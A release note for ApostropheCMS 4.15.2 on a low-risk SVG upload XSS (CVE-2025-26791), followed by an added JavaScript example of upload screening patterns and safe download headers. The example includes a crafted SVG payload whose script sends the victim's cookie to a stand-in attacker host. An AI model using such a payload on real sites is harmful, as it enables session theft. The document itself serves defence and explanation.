apostrophe 4.15.2: hotfix for potential low-risk XSS vulnerability #4935
boutell
announced in
Release Notes
Version 4.15.2, released today, fixes a potential XSS attack vector, CVE-2025-26791. While the risk was low, it was possible for one user with login and editing privileges to carry out an XSS attack on another by uploading a specially crafted SVG file.
Normally this would not work because ApostropheCMS typically renders uploaded SVGs via an img tag; however, if the second user downloaded the SVG file from the media library, the exploit could work.
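The mechanics behind the announcement above, as an added example that is not ApostropheCMS code and not the 4.15.2 fix: a constructed SVG carrying script, event-handler and javascript: URL payloads is inert when rendered through an img tag, but runs with the site's origin when the same file is opened as a top-level document, which is what a "download from the media library" link can lead to. The block shows two defences a media library can apply, a reject-on-match screen for upload time and response headers for the download path; the sample SVGs, the pattern list and the function names are assumptions for illustration.

```javascript
// Added example (not ApostropheCMS code): why an SVG that is harmless inside
// <img> becomes an XSS when served as a top-level document, and two
// defences a media library can apply: reject SVGs with active content at
// upload time, and serve downloads with headers that keep the browser from
// executing anything even if a bad file slips through.

// Constructed sample of the kind of "specially crafted SVG" the advisory
// describes. Inside <img src="evil.svg"> browsers ignore <script> and event
// handlers; opened directly on the site's origin, the script runs there.
const CRAFTED_SVG = `<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('/admin/export')">
  <script>document.location='https://attacker.invalid/?c='+document.cookie</script>
  <a href="javascript:alert(document.domain)"><text y="20">click</text></a>
</svg>`;

// Constructed benign sample: static shapes only.
const BENIGN_SVG = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="#09f"/>
</svg>`;

// Patterns that indicate script-bearing content in an SVG document. This is
// a reject-on-match screen for upload time, not a sanitizer: a match means
// "refuse the file". Anything not listed here is still a risk, so a real
// deployment should additionally parse the XML (or run DOMPurify with its
// SVG profile) rather than rely on text matching alone.
const ACTIVE_CONTENT_PATTERNS = [
  /<\s*script\b/i,                                 // inline <script> elements
  /<\s*foreignObject\b/i,                          // can embed HTML, including <script>
  /\son[a-z]+\s*=/i,                               // onload=, onclick=, onerror= ...
  /\b(?:xlink:)?href\s*=\s*["']?\s*javascript:/i,  // <a href="javascript:...">
  /<\s*(?:set|animate)\b[^>]*attributeName\s*=\s*["']?(?:xlink:)?href/i, // SMIL rewriting href
];

// Decode numeric character references so that &#106;avascript: is seen as
// javascript:, and drop NUL bytes. Out-of-range code points are discarded.
function decodeNumericEntities(text) {
  const toChar = (cp) => (Number.isInteger(cp) && cp >= 0 && cp <= 0x10ffff)
    ? String.fromCodePoint(cp)
    : '';
  return text
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => toChar(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => toChar(parseInt(d, 10)))
    .replace(/\0/g, '');
}

// Returns true when the SVG text should be refused at upload time.
function svgHasActiveContent(svgText) {
  const decoded = decodeNumericEntities(svgText);
  return ACTIVE_CONTENT_PATTERNS.some((re) => re.test(decoded));
}

// Headers for serving an uploaded SVG from a media library download route.
// Even a script-bearing SVG does nothing useful for the attacker when the
// browser is told to download rather than render it, is forbidden from
// sniffing a different type, and receives a CSP that blocks script execution
// and sandboxes the document if someone opens the file in a tab anyway.
function svgDownloadHeaders(filename) {
  const safeName = filename.replace(/[^\w.-]/g, '_');
  return {
    'Content-Type': 'image/svg+xml',
    'Content-Disposition': `attachment; filename="${safeName}"`,
    'X-Content-Type-Options': 'nosniff',
    'Content-Security-Policy': "default-src 'none'; style-src 'unsafe-inline'; sandbox",
  };
}
```

The upload-time screen and the download headers are independent layers: the first keeps crafted files out of the library, the second makes a file that does get in harmless on the path the advisory identifies, because a document delivered as an attachment under a no-script CSP cannot execute in the site's origin even if a user opens it.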